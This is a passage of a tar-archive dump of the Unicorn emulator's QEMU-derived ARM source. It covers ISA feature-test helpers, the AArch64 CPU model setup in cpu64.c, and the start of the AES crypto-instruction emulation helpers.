CPU supports single precision floating point, VFPv2 */ return FIELD_EX32(id->mvfr0, MVFR0, FPSP) > 0; } static inline bool isar_feature_aa32_fpsp_v3(const ARMISARegisters *id) { /* Return true if CPU supports single precision floating point, VFPv3 */ return FIELD_EX32(id->mvfr0, MVFR0, FPSP) >= 2; } static inline bool isar_feature_aa32_fpdp_v2(const ARMISARegisters *id) { /* Return true if CPU supports double precision floating point, VFPv2 */ return FIELD_EX32(id->mvfr0, MVFR0, FPDP) > 0; } static inline bool isar_feature_aa32_fpdp_v3(const ARMISARegisters *id) { /* Return true if CPU supports double precision floating point, VFPv3 */ return FIELD_EX32(id->mvfr0, MVFR0, FPDP) >= 2; } static inline bool isar_feature_aa32_vfp(const ARMISARegisters *id) { return isar_feature_aa32_fpsp_v2(id) || isar_feature_aa32_fpdp_v2(id); } /* * We always set the FP and SIMD FP16 fields to indicate identical * levels of support (assuming SIMD is implemented at all), so * we only need one set of accessors. */ static inline bool isar_feature_aa32_fp16_spconv(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, FPHP) > 0; } static inline bool isar_feature_aa32_fp16_dpconv(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, FPHP) > 1; } /* * Note that this ID register field covers both VFP and Neon FMAC, * so should usually be tested in combination with some other * check that confirms the presence of whichever of VFP or Neon is * relevant, to avoid accidentally enabling a Neon feature on * a VFP-no-Neon core or vice-versa. */ static inline bool isar_feature_aa32_simdfmac(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, SIMDFMAC) != 0; } static inline bool isar_feature_aa32_vsel(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 1; } static inline bool isar_feature_aa32_vcvt_dr(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 2; } static inline bool isar_feature_aa32_vrint(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 3; } static inline bool isar_feature_aa32_vminmaxnm(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 4; } static inline bool isar_feature_aa32_pan(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr3, ID_MMFR3, PAN) != 0; } static inline bool isar_feature_aa32_ats1e1(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr3, ID_MMFR3, PAN) >= 2; } static inline bool isar_feature_aa32_pmu_8_1(const ARMISARegisters *id) { /* 0xf means "non-standard IMPDEF PMU" */ return FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) >= 4 && FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) != 0xf; } static inline bool isar_feature_aa32_pmu_8_4(const ARMISARegisters *id) { /* 0xf means "non-standard IMPDEF PMU" */ return FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) >= 5 && FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) != 0xf; } static inline bool isar_feature_aa32_hpd(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, HPDS) != 0; } static inline bool isar_feature_aa32_ac2(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, AC2) != 0; } static inline bool isar_feature_aa32_ccidx(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, CCIDX) != 0; } /* * 64-bit feature tests via id registers. */ static inline bool isar_feature_aa64_aes(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, AES) != 0; } static inline bool isar_feature_aa64_pmull(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, AES) > 1; } static inline bool isar_feature_aa64_sha1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA1) != 0; } static inline bool isar_feature_aa64_sha256(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA2) != 0; } static inline bool isar_feature_aa64_sha512(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA2) > 1; } static inline bool isar_feature_aa64_crc32(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, CRC32) != 0; } static inline bool isar_feature_aa64_atomics(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, ATOMIC) != 0; } static inline bool isar_feature_aa64_rdm(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, RDM) != 0; } static inline bool isar_feature_aa64_sha3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA3) != 0; } static inline bool isar_feature_aa64_sm3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SM3) != 0; } static inline bool isar_feature_aa64_sm4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SM4) != 0; } static inline bool isar_feature_aa64_dp(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, DP) != 0; } static inline bool isar_feature_aa64_fhm(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, FHM) != 0; } static inline bool isar_feature_aa64_condm_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, TS) != 0; } static inline bool isar_feature_aa64_condm_5(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, TS) >= 2; } static inline bool isar_feature_aa64_rndr(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, RNDR) != 0; } static inline bool isar_feature_aa64_jscvt(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, JSCVT) != 0; } static inline bool isar_feature_aa64_fcma(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, FCMA) != 0; } static inline bool isar_feature_aa64_pauth(const ARMISARegisters *id) { uint64_t apa, api, gpa, gpi; /* * Note that while QEMU will only implement the architected algorithm * QARMA, and thus APA+GPA, the host cpu for kvm may use implementation * defined algorithms, and thus API+GPI, and this predicate controls * migration of the 128-bit keys. */ FIELD_DP64(0, ID_AA64ISAR1, APA, 0xf, apa) FIELD_DP64(0, ID_AA64ISAR1, API, 0xf, api) FIELD_DP64(0, ID_AA64ISAR1, GPA, 0xf, gpa) FIELD_DP64(0, ID_AA64ISAR1, GPI, 0xf, gpi) return (id->id_aa64isar1 & (apa | api | gpa | gpi)) != 0; } static inline bool isar_feature_aa64_sb(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, SB) != 0; } static inline bool isar_feature_aa64_predinv(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, SPECRES) != 0; } static inline bool isar_feature_aa64_frint(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, FRINTTS) != 0; } static inline bool isar_feature_aa64_dcpop(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, DPB) != 0; } static inline bool isar_feature_aa64_dcpodp(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, DPB) >= 2; } static inline bool isar_feature_aa64_fp_simd(const ARMISARegisters *id) { /* We always set the AdvSIMD and FP fields identically. */ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) != 0xf; } static inline bool isar_feature_aa64_fp16(const ARMISARegisters *id) { /* We always set the AdvSIMD and FP fields identically wrt FP16. */ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) == 1; } static inline bool isar_feature_aa64_aa32(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, EL0) >= 2; } static inline bool isar_feature_aa64_sve(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, SVE) != 0; } static inline bool isar_feature_aa64_vh(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, VH) != 0; } static inline bool isar_feature_aa64_lor(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, LO) != 0; } static inline bool isar_feature_aa64_pan(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, PAN) != 0; } static inline bool isar_feature_aa64_ats1e1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, PAN) >= 2; } static inline bool isar_feature_aa64_uao(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr2, ID_AA64MMFR2, UAO) != 0; } static inline bool isar_feature_aa64_bti(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr1, ID_AA64PFR1, BT) != 0; } static inline bool isar_feature_aa64_pmu_8_1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) >= 4 && FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) != 0xf; } static inline bool isar_feature_aa64_pmu_8_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) >= 5 && FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) != 0xf; } static inline bool isar_feature_aa64_rcpc_8_3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, LRCPC) != 0; } static inline bool isar_feature_aa64_rcpc_8_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, LRCPC) >= 2; } static inline bool isar_feature_aa64_ccidx(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr2, ID_AA64MMFR2, CCIDX) != 0; } /* * Feature tests for "does this exist in either 32-bit or 64-bit?" */ static inline bool isar_feature_any_fp16(const ARMISARegisters *id) { return isar_feature_aa64_fp16(id) || isar_feature_aa32_fp16_arith(id); } static inline bool isar_feature_any_predinv(const ARMISARegisters *id) { return isar_feature_aa64_predinv(id) || isar_feature_aa32_predinv(id); } static inline bool isar_feature_any_pmu_8_1(const ARMISARegisters *id) { return isar_feature_aa64_pmu_8_1(id) || isar_feature_aa32_pmu_8_1(id); } static inline bool isar_feature_any_pmu_8_4(const ARMISARegisters *id) { return isar_feature_aa64_pmu_8_4(id) || isar_feature_aa32_pmu_8_4(id); } static inline bool isar_feature_any_ccidx(const ARMISARegisters *id) { return isar_feature_aa64_ccidx(id) || isar_feature_aa32_ccidx(id); } /* * Forward to the above feature tests given an ARMCPU pointer. */ #define cpu_isar_feature(name, cpu) isar_feature_##name(&cpu->isar) #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/cpu64.c���������������������������������������������������������������0000664�0000000�0000000�00000031305�14675241067�0017327�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU AArch64 CPU * * Copyright (c) 2013 Linaro Ltd * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "qemu/osdep.h" #include "cpu.h" #include <exec/exec-all.h> void arm_cpu_realizefn(struct uc_struct *uc, CPUState *dev); void arm_cpu_class_init(struct uc_struct *uc, CPUClass *oc); void arm_cpu_post_init(CPUState *obj); void arm_cpu_initfn(struct uc_struct *uc, CPUState *obj); ARMCPU *cpu_arm_init(struct uc_struct *uc); static inline void set_feature(CPUARMState *env, int feature) { env->features |= 1ULL << feature; } static void aarch64_a57_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x411fd070; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034070; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_isar6 = 0; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001124; cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache */ cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ cpu->ccsidr[2] = 0x70ffe07a; /* 2048KB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } static void aarch64_a53_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fd034; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034070; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x84448004; /* L1Ip = VIPT */ cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_isar6 = 0; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001122; /* 40 bit physical addr */ cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x700fe01a; /* 32KB L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32KB L1 icache */ cpu->ccsidr[2] = 0x707fe07a; /* 1024KB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } static void aarch64_a72_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fd083; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034080; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10201105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001124; cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache */ cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ cpu->ccsidr[2] = 0x707fe07a; /* 1MB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } /* -cpu max: if KVM is enabled, like -cpu host (best possible with this host); * otherwise, a CPU with as many features enabled as our emulation supports. * The version of '-cpu max' for qemu-system-arm is defined in cpu.c; * this only needs to handle 64 bits. */ static void aarch64_max_initfn(struct uc_struct *uc, CPUState *obj) { uint64_t t; uint32_t u; ARMCPU *cpu = ARM_CPU(obj); aarch64_a57_initfn(uc, obj); /* * Reset MIDR so the guest doesn't mistake our 'max' CPU type for a real * one and try to apply errata workarounds or use impdef features we * don't provide. * An IMPLEMENTER field of 0 means "reserved for software use"; * ARCHITECTURE must be 0xf indicating "v7 or later, check ID registers * to see which features are present"; * the VARIANT, PARTNUM and REVISION fields are all implementation * defined and we choose to define PARTNUM just in case guest * code needs to distinguish this QEMU CPU from other software * implementations, though this shouldn't be needed. */ FIELD_DP64(0, MIDR_EL1, IMPLEMENTER, 0, t); FIELD_DP64(t, MIDR_EL1, ARCHITECTURE, 0xf ,t); FIELD_DP64(t, MIDR_EL1, PARTNUM, 'Q', t); FIELD_DP64(t, MIDR_EL1, VARIANT, 0, t); FIELD_DP64(t, MIDR_EL1, REVISION, 0, t); cpu->midr = t; t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, AES, 2, t); /* AES + PMULL */ FIELD_DP64(t, ID_AA64ISAR0, SHA1, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SHA2, 2, t); /* SHA512 */ FIELD_DP64(t, ID_AA64ISAR0, CRC32, 1, t); FIELD_DP64(t, ID_AA64ISAR0, ATOMIC, 2, t); FIELD_DP64(t, ID_AA64ISAR0, RDM, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SHA3, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SM3, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SM4, 1, t); FIELD_DP64(t, ID_AA64ISAR0, DP, 1, t); FIELD_DP64(t, ID_AA64ISAR0, FHM, 1, t); FIELD_DP64(t, ID_AA64ISAR0, TS, 2, t); /* v8.5-CondM */ FIELD_DP64(t, ID_AA64ISAR0, RNDR, 1, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, DPB, 2, t); FIELD_DP64(t, ID_AA64ISAR1, JSCVT, 1, t); FIELD_DP64(t, ID_AA64ISAR1, FCMA, 1, t); FIELD_DP64(t, ID_AA64ISAR1, APA, 1, t); /* PAuth, architected only */ FIELD_DP64(t, ID_AA64ISAR1, API, 0, t); FIELD_DP64(t, ID_AA64ISAR1, GPA, 1, t); FIELD_DP64(t, ID_AA64ISAR1, GPI, 0, t); FIELD_DP64(t, ID_AA64ISAR1, SB, 1, t); FIELD_DP64(t, ID_AA64ISAR1, SPECRES, 1, t); FIELD_DP64(t, ID_AA64ISAR1, FRINTTS, 1, t); FIELD_DP64(t, ID_AA64ISAR1, LRCPC, 2, t); /* ARMv8.4-RCPC */ cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, SVE, 1, t); FIELD_DP64(t, ID_AA64PFR0, FP, 1, t); FIELD_DP64(t, ID_AA64PFR0, ADVSIMD, 1, t); cpu->isar.id_aa64pfr0 = t; t = cpu->isar.id_aa64pfr1; FIELD_DP64(t, ID_AA64PFR1, BT, 1, t); cpu->isar.id_aa64pfr1 = t; t = cpu->isar.id_aa64mmfr1; FIELD_DP64(t, ID_AA64MMFR1, HPDS, 1, t); /* HPD */ FIELD_DP64(t, ID_AA64MMFR1, LO, 1, t); FIELD_DP64(t, ID_AA64MMFR1, VH, 1, t); FIELD_DP64(t, ID_AA64MMFR1, PAN, 2, t); /* ATS1E1 */ FIELD_DP64(t, ID_AA64MMFR1, VMIDBITS, 2, t); /* VMID16 */ cpu->isar.id_aa64mmfr1 = t; t = cpu->isar.id_aa64mmfr2; FIELD_DP64(t, ID_AA64MMFR2, UAO, 1, t); FIELD_DP64(t, ID_AA64MMFR2, CNP, 1, t); /* TTCNP */ cpu->isar.id_aa64mmfr2 = t; /* Replicate the same data to the 32-bit id registers. */ u = cpu->isar.id_isar5; FIELD_DP32(u, ID_ISAR5, AES, 2, u); /* AES + PMULL */ FIELD_DP32(u, ID_ISAR5, SHA1, 1, u); FIELD_DP32(u, ID_ISAR5, SHA2, 1, u); FIELD_DP32(u, ID_ISAR5, CRC32, 1, u); FIELD_DP32(u, ID_ISAR5, RDM, 1, u); FIELD_DP32(u, ID_ISAR5, VCMA, 1, u); cpu->isar.id_isar5 = u; u = cpu->isar.id_isar6; FIELD_DP32(u, ID_ISAR6, JSCVT, 1, u); FIELD_DP32(u, ID_ISAR6, DP, 1, u); FIELD_DP32(u, ID_ISAR6, FHM, 1, u); FIELD_DP32(u, ID_ISAR6, SB, 1, u); FIELD_DP32(u, ID_ISAR6, SPECRES, 1, u); cpu->isar.id_isar6 = u; u = cpu->isar.id_mmfr3; FIELD_DP32(u, ID_MMFR3, PAN, 2, u); /* ATS1E1 */ cpu->isar.id_mmfr3 = u; u = cpu->isar.id_mmfr4; FIELD_DP32(u, ID_MMFR4, HPDS, 1, u); /* AA32HPD */ FIELD_DP32(u, ID_MMFR4, AC2, 1, u); /* ACTLR2, HACTLR2 */ FIELD_DP32(u, ID_MMFR4, CNP, 1, u); /* TTCNP */ cpu->isar.id_mmfr4 = u; u = cpu->isar.id_aa64dfr0; FIELD_DP64(u, ID_AA64DFR0, PMUVER, 5, u); /* v8.4-PMU */ cpu->isar.id_aa64dfr0 = u; u = cpu->isar.id_dfr0; FIELD_DP32(u, ID_DFR0, PERFMON, 5, u); /* v8.4-PMU */ cpu->isar.id_dfr0 = u; } struct ARMCPUInfo { const char *name; void (*initfn)(struct uc_struct *uc, CPUState *obj); }; static const ARMCPUInfo aarch64_cpus[] = { { .name = "cortex-a57", .initfn = aarch64_a57_initfn }, { .name = "cortex-a53", .initfn = aarch64_a53_initfn }, { .name = "cortex-a72", .initfn = aarch64_a72_initfn }, { .name = "max", .initfn = aarch64_max_initfn }, }; ARMCPU *cpu_aarch64_init(struct uc_struct *uc) { ARMCPU *cpu; CPUState *cs; CPUClass *cc; CPUARMState *env; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_ARM64_A72; } else if (uc->cpu_model >= sizeof(aarch64_cpus)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init ARMCPUClass */ arm_cpu_class_init(uc, cc); /* init CPUState */ cpu_common_initfn(uc, cs); /* init ARMCPU */ arm_cpu_initfn(uc, cs); if (aarch64_cpus[uc->cpu_model].initfn) { aarch64_cpus[uc->cpu_model].initfn(uc, cs); } /* postinit ARMCPU */ arm_cpu_post_init(cs); /* realize ARMCPU */ arm_cpu_realizefn(uc, cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); env = &cpu->env; if (uc->mode & UC_MODE_BIG_ENDIAN) { for (int i = 0; i < 4; i ++) { env->cp15.sctlr_el[i] |= SCTLR_EE; env->cp15.sctlr_el[i] |= SCTLR_E0E; } } // Backward compatability to enable FULL 64bits address space. env->pstate = PSTATE_MODE_EL1h; arm_rebuild_hflags(env); return cpu; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/crypto_helper.c�������������������������������������������������������0000664�0000000�0000000�00000055244�14675241067�0021255�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * crypto_helper.c - emulate v8 Crypto Extensions instructions * * Copyright (C) 2013 - 2018 Linaro Ltd <ard.biesheuvel@linaro.org> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "crypto/aes.h" union CRYPTO_STATE { uint8_t bytes[16]; uint32_t words[4]; uint64_t l[2]; }; #ifdef HOST_WORDS_BIGENDIAN #define CR_ST_BYTE(state, i) (state.bytes[(15 - (i)) ^ 8]) #define CR_ST_WORD(state, i) (state.words[(3 - (i)) ^ 2]) #else #define CR_ST_BYTE(state, i) (state.bytes[i]) #define CR_ST_WORD(state, i) (state.words[i]) #endif void HELPER(crypto_aese)(void *vd, void *vm, uint32_t decrypt) { static uint8_t const * const sbox[2] = { AES_sbox, AES_isbox }; static uint8_t const * const shift[2] = { AES_shifts, AES_ishifts }; uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE rk = { .l = { rm[0], rm[1] } }; union CRYPTO_STATE st = { .l = { rd[0], rd[1] } }; int i; assert(decrypt < 2); /* xor state vector with round key */ rk.l[0] ^= st.l[0]; rk.l[1] ^= st.l[1]; /* combine ShiftRows operation and sbox substitution */ for (i = 0; i < 16; i++) { CR_ST_BYTE(st, i) = sbox[decrypt][CR_ST_BYTE(rk, shift[decrypt][i])]; } rd[0] = st.l[0]; rd[1] = st.l[1]; } void HELPER(crypto_aesmc)(void *vd, void *vm, uint32_t decrypt) { static uint32_t const mc[][256] = { { /* MixColumns lookup table */ 0x00000000, 0x03010102, 0x06020204, 0x05030306, 0x0c040408, 0x0f05050a, 0x0a06060c, 0x0907070e, 0x18080810, 0x1b090912, 0x1e0a0a14, 0x1d0b0b16, 0x140c0c18, 0x170d0d1a, 0x120e0e1c, 0x110f0f1e, 0x30101020, 0x33111122, 0x36121224, 0x35131326, 0x3c141428, 0x3f15152a, 0x3a16162c, 0x3917172e, 0x28181830, 0x2b191932, 0x2e1a1a34, 0x2d1b1b36, 0x241c1c38, 0x271d1d3a, 0x221e1e3c, 0x211f1f3e, 0x60202040, 0x63212142, 0x66222244, 0x65232346, 0x6c242448, 0x6f25254a, 0x6a26264c, 0x6927274e, 0x78282850, 0x7b292952, 0x7e2a2a54, 0x7d2b2b56, 0x742c2c58, 0x772d2d5a, 0x722e2e5c, 0x712f2f5e, 0x50303060, 0x53313162, 0x56323264, 0x55333366, 0x5c343468, 0x5f35356a, 0x5a36366c, 0x5937376e, 0x48383870, 0x4b393972, 0x4e3a3a74, 0x4d3b3b76, 0x443c3c78, 0x473d3d7a, 0x423e3e7c, 0x413f3f7e, 0xc0404080, 0xc3414182, 0xc6424284, 0xc5434386, 0xcc444488, 0xcf45458a, 0xca46468c, 0xc947478e, 0xd8484890, 0xdb494992, 0xde4a4a94, 0xdd4b4b96, 0xd44c4c98, 0xd74d4d9a, 0xd24e4e9c, 0xd14f4f9e, 0xf05050a0, 0xf35151a2, 0xf65252a4, 0xf55353a6, 0xfc5454a8, 0xff5555aa, 0xfa5656ac, 0xf95757ae, 0xe85858b0, 0xeb5959b2, 0xee5a5ab4, 0xed5b5bb6, 0xe45c5cb8, 0xe75d5dba, 0xe25e5ebc, 0xe15f5fbe, 0xa06060c0, 0xa36161c2, 0xa66262c4, 0xa56363c6, 0xac6464c8, 0xaf6565ca, 